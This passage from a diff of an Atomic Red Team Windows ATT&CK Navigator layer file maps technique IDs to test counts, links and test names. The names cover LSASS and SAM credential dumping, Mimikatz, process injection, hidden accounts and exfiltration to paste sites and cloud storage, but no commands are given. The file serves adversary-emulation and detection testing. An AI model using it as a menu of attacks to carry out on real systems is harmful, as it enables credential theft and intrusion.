Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search 
Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator 
Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM 
Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with 
ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl 
windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via 
Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":20,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- 
